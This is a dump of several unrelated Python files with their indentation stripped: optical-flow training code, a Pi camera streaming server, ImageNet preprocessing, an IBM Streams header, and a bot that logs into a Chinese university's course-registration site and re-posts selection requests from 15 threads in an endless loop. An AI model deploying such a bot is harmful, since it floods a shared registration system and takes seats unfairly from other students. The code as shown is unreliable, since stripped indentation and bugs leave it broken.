img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
elif dataset_cfg.dataset.value == 'things3d':
batch_size = 4
print('loading things3d dataset ...')
sub_type = dataset_cfg.sub_type.get('clean')
print('sub_type: ' + sub_type)
sys.stdout.flush()
orig_shape = [540, 960]
# %%%% WARNING %%%%
# the things3d dataset (subset) is very large
# therefore, the flow is converted to float16 by default
# in float16 format, the complete dataset is about 400 GB
# please set proper args.shard according to your device
# for example, if args.shard = 4, then one fourth of data is loaded
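# note: lst[:samples:args.shard] below keeps every args.shard-th entry; when samples == -1
# (the non-debug default) the stop index also drops the final entry of each list.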
# training
things3d_dataset = things3d.list_data(sub_type = sub_type)
print(len(things3d_dataset['flow']))
print(len(things3d_dataset['flow'][:samples:args.shard]))
print(things3d_dataset['flow'][0])
from pympler.asizeof import asizeof
trainImg1 = [cv2.imread(file).astype('uint8') for file in things3d_dataset['image_0'][:samples:args.shard]]
print(asizeof(trainImg1[0]))
print(asizeof(trainImg1))
trainImg2 = [cv2.imread(file).astype('uint8') for file in things3d_dataset['image_1'][:samples:args.shard]]
print(asizeof(trainImg2[0]))
print(asizeof(trainImg2))
trainFlow = [things3d.load(file).astype('float16') for file in things3d_dataset['flow'][:samples:args.shard]]
print(asizeof(trainFlow[0]))
print(asizeof(trainFlow))
trainSize = len(trainFlow)
training_datasets = [(trainImg1, trainImg2, trainFlow)] * batch_size
print(asizeof(training_datasets))
# validation- chairs
_, validationSet = trainval.read(chairs_split_file)
validationSet = validationSet[:samples]
validationImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in validationSet]
validationImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in validationSet]
validationFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in validationSet]
validationSize = len(validationFlow)
validation_datasets['chairs'] = (validationImg1, validationImg2, validationFlow)
'''
# validation- sintel
sintel_dataset = sintel.list_data()
divs = ('training',) if not getattr(config.network, 'class').get() == 'MaskFlownet' else ('training2',)
for div in divs:
for k, dataset in sintel_dataset[div].items():
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
# validation- kitti
for kitti_version in ('2012', '2015'):
dataset = kitti.read_dataset(editions = kitti_version, crop = (370, 1224))
validationSize += len(dataset['flow'])
validation_datasets['kitti.' + kitti_version] = (dataset['image_0'], dataset['image_1'], dataset['flow'], dataset['occ'])
'''
elif dataset_cfg.dataset.value == 'chairs':
batch_size = 8
print('loading chairs data ...')
sys.stdout.flush()
orig_shape = [384, 512]
trainSet, validationSet = trainval.read(chairs_split_file)
# training
trainSet = trainSet[:samples]
trainImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in trainSet]
trainImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in trainSet]
trainFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in trainSet]
trainSize = len(trainFlow)
training_datasets = [(trainImg1, trainImg2, trainFlow)] * batch_size
# validation- chairs
validationSet = validationSet[:samples]
validationImg1 = [ppm.load(os.path.join(chairs_path, '%05d_img1.ppm' % i)) for i in validationSet]
validationImg2 = [ppm.load(os.path.join(chairs_path, '%05d_img2.ppm' % i)) for i in validationSet]
validationFlow = [flo.load(os.path.join(chairs_path, '%05d_flow.flo' % i)) for i in validationSet]
validationSize = len(validationFlow)
validation_datasets['chairs'] = (validationImg1, validationImg2, validationFlow)
# validation- sintel
sintel_dataset = sintel.list_data()
divs = ('training',) if not getattr(config.network, 'class').get() == 'MaskFlownet' else ('training2',)
for div in divs:
for k, dataset in sintel_dataset[div].items():
dataset = dataset[:samples]
img1, img2, flow, mask = [[sintel.load(p) for p in data] for data in zip(*dataset)]
validationSize += len(flow)
validation_datasets['sintel.' + k] = (img1, img2, flow, mask)
else:
raise NotImplementedError
print('Using {}s'.format(default_timer() - t0))
sys.stdout.flush()
#
assert batch_size % len(ctx) == 0
batch_size_card = batch_size // len(ctx)
orig_shape = dataset_cfg.orig_shape.get(orig_shape)
target_shape = dataset_cfg.target_shape.get([shape_axis + (64 - shape_axis) % 64 for shape_axis in orig_shape])
print('original shape: ' + str(orig_shape))
print('target shape: ' + str(target_shape))
sys.stdout.flush()
# create log file
log = logger.FileLog(os.path.join(repoRoot, 'logs', 'debug' if args.debug else '', '{}.log'.format(run_id)))
log.log('start={}, train={}, val={}, host={}, batch={}'.format(steps, trainSize, validationSize, socket.gethostname(), batch_size))
information = ', '.join(['{}={}'.format(k, repr(args.__dict__[k])) for k in args.__dict__])
log.log(information)
# implement data augmentation
import augmentation
# chromatic augmentation
aug_func = augmentation.ColorAugmentation
if dataset_cfg.dataset.value == 'sintel':
color_aug = aug_func(contrast_range=(-0.4, 0.8), brightness_sigma=0.1, channel_range=(0.8, 1.4), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0), saturation=0.5, hue=0.5, eigen_aug = False)
elif dataset_cfg.dataset.value == 'kitti':
color_aug = aug_func(contrast_range=(-0.2, 0.4), brightness_sigma=0.05, channel_range=(0.9, 1.2), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0.02), saturation=0.25, hue=0.1, gamma_range=(-0.5, 0.5), eigen_aug = False)
else:
color_aug = aug_func(contrast_range=(-0.4, 0.8), brightness_sigma=0.1, channel_range=(0.8, 1.4), batch_size=batch_size_card,
shape=target_shape, noise_range=(0, 0.04), saturation=0.5, hue=0.5, eigen_aug = False)
color_aug.hybridize()
# geometric augmentation
aug_func = augmentation.GeometryAugmentation
if dataset_cfg.dataset.value == 'sintel':
geo_aug = aug_func(angle_range=(-17, 17), zoom_range=(1 / 1.5, 1 / 0.9), aspect_range=(0.9, 1 / 0.9), translation_range=0.1,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.96, 1 / 0.96), relative_translation=0.25
)
elif dataset_cfg.dataset.value == 'kitti':
geo_aug = aug_func(angle_range=(-5, 5), zoom_range=(1 / 1.25, 1 / 0.95), aspect_range=(0.95, 1 / 0.95), translation_range=0.05,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.98, 1 / 0.98), relative_translation=0.25
)
else:
geo_aug = aug_func(angle_range=(-17, 17), zoom_range=(0.5, 1 / 0.9), aspect_range=(0.9, 1 / 0.9), translation_range=0.1,
target_shape=target_shape, orig_shape=orig_shape, batch_size=batch_size_card,
relative_angle=0.25, relative_scale=(0.96, 1 / 0.96), relative_translation=0.25
)
geo_aug.hybridize()
def index_generator(n):
indices = np.arange(0, n, dtype=np.int64)  # np.int is removed in newer NumPy releases
while True:
np.random.shuffle(indices)
yield from indices
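# The two classes below keep exponentially decayed running averages for the log output:
# `sum` accumulates ratio-discounted values and `weight` the matching discounted count,
# so `average` is properly normalised even after only a few updates.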
class MovingAverage:
def __init__(self, ratio=0.95):
self.sum = 0
self.weight = 1e-8
self.ratio = ratio
def update(self, v):
self.sum = self.sum * self.ratio + v
self.weight = self.weight * self.ratio + 1
@property
def average(self):
return self.sum / self.weight
class DictMovingAverage:
def __init__(self, ratio=0.95):
self.sum = {}
self.weight = {}
self.ratio = ratio
def update(self, v):
for key in v:
if key not in self.sum:
self.sum[key] = 0
self.weight[key] = 1e-8
self.sum[key] = self.sum[key] * self.ratio + v[key]
self.weight[key] = self.weight[key] * self.ratio + 1
@property
def average(self):
return dict([(key, self.sum[key] / self.weight[key]) for key in self.sum])
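# For example, with the default ratio of 0.95: after update({'loss': 0.7}) and then
# update({'loss': 0.5}), average is roughly {'loss': 0.6}, with the newer value weighted slightly more.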
loading_time = MovingAverage()
total_time = MovingAverage()
train_avg = DictMovingAverage()
from threading import Thread
from queue import Queue
def iterate_data(iq, dataset):
gen = index_generator(len(dataset[0]))
while True:
i = next(gen)
data = [item[i] for item in dataset]
space_x, space_y = data[0].shape[0] - orig_shape[0], data[0].shape[1] - orig_shape[1]
crop_x, crop_y = space_x and np.random.randint(space_x), space_y and np.random.randint(space_y)
data = [np.transpose(arr[crop_x: crop_x + orig_shape[0], crop_y: crop_y + orig_shape[1]], (2, 0, 1)) for arr in data]
# random horizontal flip: reverse the width axis and negate the horizontal flow component
if np.random.randint(2):
data = [arr[:, :, ::-1] for arr in data]
data[2] = np.stack([-data[2][0, :, :], data[2][1, :, :]], axis = 0)
iq.put(data)
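# batch_samples pulls batch_size items round-robin from the per-dataset queues
# (batch_size // len(iqs) from each) and stacks every field into a single numpy batch.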
def batch_samples(iqs, oq, batch_size):
while True:
data_batch = []
for iq in iqs:
for i in range(batch_size // len(iqs)):
data_batch.append(iq.get())
oq.put([np.stack(x, axis=0) for x in zip(*data_batch)])
def remove_file(iq):
while True:
f = iq.get()
try:
os.remove(f)
except OSError as e:
log.log('Remove failed: ' + str(e))
batch_queue = Queue(maxsize=10)
remove_queue = Queue(maxsize=50)
def start_daemon(thread):
thread.daemon = True
thread.start()
data_queues = [Queue(maxsize=100) for _ in training_datasets]
for data_queue, dataset in zip(data_queues, training_datasets):
start_daemon(Thread(target=iterate_data, args=(data_queue, dataset)))
start_daemon(Thread(target=remove_file, args=(remove_queue,)))
for i in range(1):
start_daemon(Thread(target=batch_samples, args=(data_queues, batch_queue, batch_size)))
t1 = None
checkpoints = []
while True:
steps += 1
if not pipe.set_learning_rate(steps):
sys.exit(0)
batch = []
t0 = default_timer()
if t1:
total_time.update(t0 - t1)
t1 = t0
batch = batch_queue.get()
loading_time.update(default_timer() - t0)
# with or without the given invalid mask
if len(batch) == 4:
img1, img2, flow, mask = [batch[i] for i in range(4)]
train_log = pipe.train_batch(img1, img2, flow, geo_aug, color_aug, mask = mask)
else:
img1, img2, flow = [batch[i] for i in range(3)]
train_log = pipe.train_batch(img1, img2, flow, geo_aug, color_aug)
# update log
if steps <= 20 or steps % 50 == 0:
train_avg.update(train_log)
log.log('steps={}{}, total_time={:.2f}'.format(steps, ''.join([', {}={}'.format(k, v) for k, v in train_avg.average.items()]), total_time.average))
# do validation
if steps % validation_steps == 0 or steps <= 1:
val_result = None
if validationSize > 0:
val_result = validate()
log.log('steps={}{}'.format(steps, ''.join([', {}={}'.format(k, v) for k, v in val_result.items()])))
# save parameters
if steps % checkpoint_steps == 0:
prefix = os.path.join(repoRoot, 'weights', '{}_{}'.format(run_id, steps))
pipe.save(prefix)
checkpoints.append(prefix)
# remove the older checkpoints
while len(checkpoints) > 3:
prefix = checkpoints[0]
checkpoints = checkpoints[1:]
remove_queue.put(prefix + '.params')
remove_queue.put(prefix + '.states')
|
main.py
|
import requests
from PIL import Image
from bs4 import BeautifulSoup
import copy
import time
import re
import os
import json
import threading
import csv
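# Spider is a course-selection bot for the jw1.wzbc.edu.cn academic-affairs site: it logs in
# (the captcha image is shown and typed in by the user), lists the available courses, and then
# keeps re-posting the selection form from several threads.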
class Spider:
class Lesson:
def __init__(self, name, code, teacher_name, Time, number):
self.name = name
self.code = code
self.teacher_name = teacher_name
self.time = Time
self.number = number
def show(self):
print(' name:' + self.name + ' code:' + self.code + ' teacher_name:' + self.teacher_name + ' time:' + self.time + ' remaining:' + self.number)
def show_list(self):
return [self.name, self.code, self.teacher_name , self.time]
def __init__(self, url):
self.__uid = ''
self.__real_base_url = ''
self.__base_url = url
self.__name = ''
self.__base_data = {
'__EVENTTARGET': 'ddl_ywyl',
'__EVENTARGUMENT': '',
'ddl_kcxz': '',
'ddl_ywyl': '',  # '' selects all courses regardless of remaining seats; '%CE%DE' = none left, '%D3%D0' = seats left
'ddl_kcgs': '',
'ddl_xqbs': '',
'ddl_sksj': '',
'TextBox1': '',
'dpkcmcGrid:txtChoosePage': '1',
'dpkcmcGrid:txtPageSize': '100',
'__VIEWSTATE': ''
}
self.__headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36',
}
self.session = requests.Session()
self.__now_lessons_number = 0
def __set_real_url(self):
'''
Resolve the real login URL (when there is no cookie yet)
and obtain the session cookie.
:return: the request
'''
request = self.session.get(self.__base_url, headers=self.__headers)
real_url = request.url
if real_url != 'http://jw1.wzbc.edu.cn/' and real_url != 'http://jw1.wzbc.edu.cn/index.apsx':
self.__real_base_url = real_url[:len(real_url) - len('default2.aspx')]
else:
if real_url.find('index') > 0:
self.__real_base_url = real_url[:len(real_url) - len('index.aspx')]
else:
self.__real_base_url = real_url
return request
def __get_code(self):
'''
Fetch the captcha image and prompt the user to type it.
:return: the captcha string
'''
if self.__real_base_url != 'http://jw1.wzbc.edu.cn/':
request = self.session.get(self.__real_base_url + 'CheckCode.aspx', headers=self.__headers)
else:
request = self.session.get(self.__real_base_url + 'CheckCode.aspx?', headers=self.__headers)
with open('code.jpg', 'wb')as f:
f.write(request.content)
im = Image.open('code.jpg')
im.show()
print('Please input the code:')
code = input()
return code
def __get_login_data(self, uid, password):
'''
Build the login form data.
:param uid: student number
:param password: password
:return: dict containing the login form fields
'''
self.__uid = uid
request = self.__set_real_url()
soup = BeautifulSoup(request.text, 'lxml')
form_tag = soup.find('input')
__VIEWSTATE = form_tag['value']
code = self.__get_code()
data = {
'__VIEWSTATE': __VIEWSTATE,
'txtUserName': self.__uid,
'TextBox2': password,
'txtSecretCode': code,
'RadioButtonList1': '学生'.encode('gb2312'),  # role "student"; must stay GB2312-encoded Chinese for the server
'Button1': '',
'lbLanguage': '',
'hidPdrs': '',
'hidsc': '',
}
return data
def login(self, uid, password):
'''
Public login entry point.
:param uid: student number
:param password: password
:return: a boolean indicating whether the login succeeded (or raises on unexpected errors)
'''
while True:
data = self.__get_login_data(uid, password)
if self.__real_base_url != 'http://jw1.wzbc.edu.cn/':
request = self.session.post(self.__real_base_url + 'Default2.aspx', headers=self.__headers, data=data)
else:
request = self.session.post(self.__real_base_url , headers=self.__headers, data=data)
soup = BeautifulSoup(request.text, 'lxml')
if request.status_code != requests.codes.ok:  # check whether the request succeeded
print('4XX or 5XX Error,try to login again')
time.sleep(0.5)
continue
if request.text.find('验证码不正确') > -1:  # page reports "captcha incorrect"
print('Incorrect captcha, retrying')
continue
if request.text.find('密码错误') > -1:  # page reports "wrong password"
print('Incorrect password')
return False
if request.text.find('用户名不存在') > -1:  # page reports "user does not exist"
print('Invalid username')
return False
try:
name_tag = soup.find(id='xhxm')
self.__name = name_tag.string[:len(name_tag.string) - 2]
print('Welcome, ' + self.__name)
self.__enter_lessons_first()
return True
except:
print('Unknown error, trying to log in again')
time.sleep(0.5)
continue
def __enter_lessons_first(self):
'''
Enter the course-selection page for the first time.
:return: None
'''
data = {
'xh': self.__uid,
'xm': self.__name.encode('gb2312'),
'gnmkdm': 'N121101',
}
self.__headers['Referer'] = self.__real_base_url + 'xs_main.aspx?xh=' + self.__uid
request = self.session.get(self.__real_base_url + 'xf_xsqxxxk.aspx', params=data, headers=self.__headers)
self.__headers['Referer'] = request.url
# print(request.text)
soup = BeautifulSoup(request.text, 'lxml')
# print(soup)
self.__set__VIEWSTATE(soup)
selected_lessons_pre_tag = soup.find('legend', text='已选课程')  # legend text: "selected courses"
selected_lessons_tag = selected_lessons_pre_tag.next_sibling
tr_list = selected_lessons_tag.find_all('tr')[1:]
self.__now_lessons_number = len(tr_list)
try:
xq_tag = soup.find('select', id='ddl_xqbs')
self.__base_data['ddl_xqbs'] = xq_tag.find('option')['value']
except:
pass
def __set__VIEWSTATE(self, soup):
__VIEWSTATE_tag = soup.find('input', attrs={'name': '__VIEWSTATE'})
self.__base_data['__VIEWSTATE'] = __VIEWSTATE_tag['value']
def __get_lessons(self, soup):
'''
Extract course information from the given soup.
:param soup: parsed course-list page
:return: list of Lesson objects
'''
lesson_list = []
lessons_tag = soup.find('table', id='kcmcGrid')
lesson_tag_list = lessons_tag.find_all('tr')[1:]
for lesson_tag in lesson_tag_list:
td_list = lesson_tag.find_all('td')
# code = td_list[0].input['name']  # td_list[0] is the checkbox
# name = td_list[1].string  # always None, can be ignored
name = td_list[2].string  # course name
code = td_list[0].input['name']  # this is actually the course code
teacher_name = td_list[4].string  # td_list[4] is the teacher name for this course code
try:
Time = td_list[5]['title']
except:
Time = ''
number = td_list[11].string  # td_list[11] is the number of seats remaining
num = int(number)
# uncomment the check below to hide courses with no seats remaining
# if num > 0:
lesson = self.Lesson(name, code, teacher_name, Time, number)
lesson_list.append(lesson)
return lesson_list
def __search_lessons(self, lesson_name=''):
'''
Search for courses.
:param lesson_name: course name (empty string lists everything)
:return: list of Lesson objects
'''
self.__base_data['TextBox1'] = lesson_name.encode('gb2312')
data = self.__base_data.copy()
# data['Button2'] = '确定'.encode('gb2312')
request = self.session.post(self.__headers['Referer'], data=data, headers=self.__headers)
#print(request)
#print(request.text)
soup = BeautifulSoup(request.text, 'lxml')
#print(soup)
self.__set__VIEWSTATE(soup)
return self.__get_lessons(soup)
def __select_lesson(self, lesson_list):
'''
Keep submitting the selection form for the given courses.
:param lesson_list: list of Lesson objects to select
:return: None (loops forever)
'''
data = copy.deepcopy(self.__base_data)
data['Button1'] = ' 提交 '.encode('gb2312')  # '提交' = submit button
while True:
for lesson in lesson_list:
try:
code = lesson.code
data[code] = 'on'
# data['kcmcGrid:_ctl2:xk']='on'
request = self.session.post(self.__headers['Referer'], data=data, headers=self.__headers,timeout=5)
except:
continue
start = time.time()
soup = BeautifulSoup(request.text, 'lxml')
self.__set__VIEWSTATE(soup)
error_tag = soup.html.head.script
if not error_tag is None:
error_tag_text = error_tag.string
r = "alert\('(.+?)'\);"
for s in re.findall(r, error_tag_text):
print(s)
selected_lessons_pre_tag = soup.find('legend', text='已选课程')  # legend text: "selected courses"
selected_lessons_tag = selected_lessons_pre_tag.next_sibling
tr_list = selected_lessons_tag.find_all('tr')[1:]
print('Selected courses:')
for tr in tr_list:
td = tr.find('td')
print(td.string)
print()
def run(self,uid,password):
'''
Run the bot: log in, pick courses, then start the selection threads.
:return: None
'''
if self.login(uid, password):
for i in range(100):
self.__base_data['kcmcGrid:_ctl'+str(i+2)+':jcnr']='|||'
print('Choose campus, south or north (0/1):')
if(input()=='0'):
self.__base_data['ddl_xqbs']='3'
else:
self.__base_data['ddl_xqbs']='4'
# print(self.__base_data.keys())
print('Enter a course name to search for; press Enter to list all available courses')
lesson_name = input()
lesson_list = self.__search_lessons(lesson_name)
for i in range(len(lesson_list)):
print(i, end='')
lesson_list[i].show()
# if(self.__base_data['ddl_xqbs']=='3'):
# write_data(lesson_list, '南校区课程.csv')
# else:
# write_data(lesson_list, '北校区课程.csv')
print('Enter the ids of the courses to select (the number before each course, comma separated); if nothing is listed, no elective courses are currently available')
select_id = input().split(',')
# print(select_id)
# select_id = int(input())
select_list=[]
for ClsId in select_id:
select_list.append(lesson_list[int(ClsId)])
thread_list = list()
for i in range(15):
thread_list.append(threading.Thread(target=self.__select_lesson,args=(select_list,)))
for i in range(15):
thread_list[i].start()
for i in range(15):
thread_list[i].join()
def write_data(data, name):
file_name = name
with open(file_name, 'w', errors='ignore', newline='') as f:
f_csv = csv.writer(f)
for i in range(len(data)):
f_csv.writerow(data[i].show_list())
if __name__ == '__main__':
print('Trying to log in...')
with open('config.json',encoding='utf-8')as f:
config = json.load(f)
url = config['url']
uid = config['student_number']
password = config['password']
spider = Spider(url)
spider.run(uid, password)
os.system("pause")
'''
The print calls on lines 212, 213 and 215 are commented out; they are not essential.
'''
|
server.py
|
# Taken from https://github.com/waveform80/pistreaming/blob/master/server.py.
# Moved classes into their own files.
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import picamera
from ws4py.server.wsgiutils import WebSocketWSGIApplication
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from BroadcastOutput import BroadcastOutput
from BroadcastThread import BroadcastThread
from Configuration import Configuration
from SteamingWebSocket import StreamingWebSocketFactory
from StreamHttpServer import StreamHttpServer
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
# Config object so that it's easier to pass around
CONFIG = Configuration(
WIDTH,
HEIGHT ,
FRAMERATE ,
HTTP_PORT ,
WS_PORT ,
COLOR ,
BGCOLOR ,
JSMPEG_MAGIC ,
JSMPEG_HEADER ,
VFLIP,
HFLIP
)
###########################################
def wsFactory():
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocketFactory(CONFIG)))
websocket_server.initialize_websockets_manager()
print('Creating websocket at %d' % WS_PORT)
# websocket_server.initialize_websockets_manager()
return websocket_server
def httpFactory():
return StreamHttpServer(CONFIG)
def broadcastFactory(camera: picamera.PiCamera):
return BroadcastOutput(camera)
def main():
print('Initializing camera')
print(CONFIG)
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(2) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
websocket_server = wsFactory()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = httpFactory()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = broadcastFactory(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
prepare_imagenet.py
|
# Copyright 2019-2020 Stanislav Pidhorskyi
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Create a tfrecords for ImageNET. """
import sys
sys.path.insert('../..')
import os
import scipy.io as sio
import torch
from PIL import Image
import random
import argparse
from configs.defaults import get_cfg_defaults
import sys
import logging
import tensorflow as tf
from torchvision.transforms import functional as F
from torch.nn.functional import avg_pool2d
from utils import cache
import numpy as np
import tqdm
from multiprocessing import Pool
from threading import Thread
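# process_fold writes one tfrecords shard per level of detail (LOD 8 down to 2) for its fold:
# each image is resized, centre-cropped and serialized together with its class label, and is
# halved with 2x2 average pooling between successive LODs, so the coarser levels appear to
# receive progressively smaller copies of the same image.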
def process_fold(i, path, image_folds, train_root, wnid_to_indx, fixed=False):
writers = {}
for lod in range(8, 1, -1):
tfr_opt = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.NONE)
part_path = path % (lod, i)
os.makedirs(os.path.dirname(part_path), exist_ok=True)
tfr_writer = tf.python_io.TFRecordWriter(part_path, tfr_opt)
writers[lod] = tfr_writer
for s, image in image_folds[i]:
im = os.path.join(train_root, s, image)
img = Image.open(im)
if fixed:
img = F.resize(img, 288)
img = F.center_crop(img, 256)
else:
img = F.resize(img, 288)
img = F.center_crop(img, 288)
img = np.asarray(img)
if len(img.shape) == 2:
img = np.tile(img[:, :, None], (1, 1, 3))
img = img.transpose((2, 0, 1))
if img.shape[0] > 3:
img = img[:3]
for lod in range(8, 1, -1):
ex = tf.train.Example(features=tf.train.Features(feature={
'shape': tf.train.Feature(int64_list=tf.train.Int64List(value=img.shape)),
'label': tf.train.Feature(int64_list=tf.train.Int64List(value=[wnid_to_indx[s]])),
'data': tf.train.Feature(bytes_list=tf.train.BytesList(value=[img.tostring()]))}))
writers[lod].write(ex.SerializeToString())
image = torch.tensor(np.asarray(img, dtype=np.float32)).view(1, 3, img.shape[1], img.shape[2])
image_down = avg_pool2d(image, 2, 2).clamp_(0, 255).to('cpu', torch.uint8).view(3, image.shape[2] // 2,
image.shape[3] // 2).numpy()
img = image_down
for lod in range(8, 1, -1):
writers[lod].close()
def parse_meta_mat(devkit_root):
metafile = os.path.join(devkit_root, "data", "meta.mat")
meta = sio.loadmat(metafile, squeeze_me=True)['synsets']
nums_children = list(zip(*meta))[4]
meta = [meta[idx] for idx, num_children in enumerate(nums_children)
if num_children == 0]
idcs, wnids, classes = list(zip(*meta))[:3]
classes = [tuple(clss.split(', ')) for clss in classes]
idx_to_wnid = {idx: wnid for idx, wnid in zip(idcs, wnids)}
wnid_to_classes = {wnid: clss for wnid, clss in zip(wnids, classes)}
return idx_to_wnid, wnid_to_classes
def parse_val_groundtruth_txt(devkit_root):
file = os.path.join(devkit_root, "data",
"ILSVRC2012_validation_ground_truth.txt")
with open(file, 'r') as txtfh:
val_idcs = txtfh.readlines()
return [int(val_idx) for val_idx in val_idcs]
@cache
def get_names(train_root):
names = []
sets = os.listdir(train_root)
for s in sets:
images = os.listdir(os.path.join(train_root, s))
names += [(s, im) for im in images]
return names
def prepare_imagenet(cfg, logger):
devkit_root = "/data/datasets/ImageNet_bak/ILSVRC2012_devkit_t12"
idx_to_wnid, wnid_to_classes = parse_meta_mat(devkit_root)
val_idcs = parse_val_groundtruth_txt(devkit_root)
val_wnids = [idx_to_wnid[idx] for idx in val_idcs]
for i in range(1, 1001):
w = idx_to_wnid[i]
c = wnid_to_classes[w]
print("%d - %s" % (i, c))
wnid_to_indx = dict([(v, k - 1) for k, v in idx_to_wnid.items()])
torch.save((wnid_to_classes, val_wnids), os.path.join("", "meta"))
train_root = "/data/datasets/ImageNet_bak/raw-data/train"
validation_root = "/data/datasets/ImageNet_bak/raw-data/validation"
###
logger.info("Savingexamples")
path = 'dataset_samples/imagenet256x256'
os.makedirs(path, exist_ok=True)
k = 0
names = get_names(train_root)
random.shuffle(names)
for s, image in names:
im = os.path.join(train_root, s, image)
img = Image.open(im)
img = F.resize(img, 288)
img = F.center_crop(img, 256)
img = np.asarray(img)
if len(img.shape) == 2:
img = np.tile(img[:, :, None], (1, 1, 3))
img = img.transpose((2, 0, 1))
if img.shape[0] > 3:
img = img[:3]
img = img.transpose((1, 2, 0))
img = Image.fromarray(img)
img.save(path + '/' + str(k) + ".png")
k += 1
if k == 2000:
break
###
exit()
if True:
random.seed(0)
names = get_names(train_root)
random.shuffle(names)
folds = 16 # cfg.DATASET.PART_COUNT
image_folds = [[] for _ in range(folds)]
count_per_fold = len(names) // folds
for i in range(folds):
image_folds[i] += names[i * count_per_fold: (i + 1) * count_per_fold]
threads = []
for i in range(folds):
thread = Thread(target=process_fold, args=(i, cfg.DATASET.PATH, image_folds, train_root, wnid_to_indx, False))
thread.start()
threads.append(thread)
for i in range(folds):
threads[i].join()
if False:
random.seed(0)
names = get_names(validation_root)
random.shuffle(names)
folds = 1 # cfg.DATASET.PART_COUNT
image_folds = [[] for _ in range(folds)]
count_per_fold = len(names) // folds
for i in range(folds):
image_folds[i] += names[i * count_per_fold: (i + 1) * count_per_fold]
threads = []
for i in range(folds):
thread = Thread(target=process_fold, args=(i, cfg.DATASET.PATH_TEST, image_folds, validation_root, wnid_to_indx, True))
thread.start()
threads.append(thread)
for i in range(folds):
threads[i].join()
print(idx_to_wnid, wnid_to_classes)
def run():
parser = argparse.ArgumentParser(description="ALAE imagenet")
parser.add_argument(
"--config-file",
default="configs/imagenet.yaml",
metavar="FILE",
help="path to config file",
type=str,
)
parser.add_argument(
"opts",
help="Modify config options using the command-line",
default=None,
nargs=argparse.REMAINDER,
)
args = parser.parse_args()
cfg = get_cfg_defaults()
cfg.merge_from_file(args.config_file)
cfg.merge_from_list(args.opts)
cfg.freeze()
logger = logging.getLogger("logger")
logger.setLevel(logging.DEBUG)
output_dir = cfg.OUTPUT_DIR
os.makedirs(output_dir, exist_ok=True)
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
logger.info(args)
logger.info("Loaded configuration file {}".format(args.config_file))
with open(args.config_file, "r") as cf:
config_str = "\n" + cf.read()
logger.info(config_str)
logger.info("Running with config:\n{}".format(cfg))
prepare_imagenet(cfg, logger)
if __name__ == '__main__':
run()
|
context.py
|
# coding=utf-8
# Licensed Materials - Property of IBM
# Copyright IBM Corp. 2015,2017
"""Context for submission of applications.
The main function is :py:func:`submit` to submit
a :py:class:`~streamsx.topology.topology.Topology`
to a Streaming Analytics service or IBM® Streams instance for execution.
"""
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
try:
from future import standard_library
standard_library.install_aliases()
except (ImportError, NameError):
# nothing to do here
pass
from streamsx import rest
import logging
import os
import os.path
import json
